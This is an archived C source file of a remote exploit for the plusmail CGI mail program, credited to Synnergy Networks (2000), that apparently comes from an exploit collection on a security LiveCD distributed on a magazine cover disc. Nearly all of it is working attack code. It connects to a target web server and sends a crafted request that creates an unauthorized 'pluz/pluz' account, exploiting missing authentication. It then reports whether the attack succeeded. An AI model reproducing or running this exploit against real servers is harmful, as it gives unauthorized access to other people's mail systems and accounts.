Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / plusmail / plusmail1.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 1.6 KB | 73 lines

/* * [Synnergy Networks http://www.synnergy.net] * * Title: plusbug.c - [remote plusmail exploit] * Author: headflux (hf@synnergy.net) * Date: 01.10.2000 * Description: plusmail fails to check authenticity before creating new * accounts * * [Synnergy Networks (c) 2000, http://www.synnergy.net] */ #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <string.h> #include <sys/errno.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> int main(int argc, char *argv[]) { char *expcgi = "GET /cgi-bin/plusmail?login=pluz&password=pluz&" "password1=pluz&new_login=Login HTTP/1.0\n\n"; struct hostent *hp; struct in_addr addr; struct sockaddr_in s; u_char buf[280]; int p, i; if (argc < 1) { printf("usage: %s hostname\n", argv[0]); exit(1); } hp = gethostbyname(argv[1]); if(!hp) { printf("bad hostname.\n"); exit(1); } bcopy (hp->h_addr, &addr, sizeof (struct in_addr)); p = socket (s.sin_family = 2, 1, IPPROTO_TCP); s.sin_port = htons(80); s.sin_addr.s_addr = inet_addr (inet_ntoa (addr)); if(connect (p, &s, sizeof (s))!=0) { printf("error: unable to connect.\n"); return; } else { send(p, expcgi, strlen(expcgi), 0); alarm(5); read(p, buf, 255); close(p); } if (strstr(buf, "200 OK") && ! strstr(buf, "Invalid")) printf("account pluz/pluz created.\n"); else printf("exploit failed.\n"); return(0); } /* www.hack.co.za [21 July]*/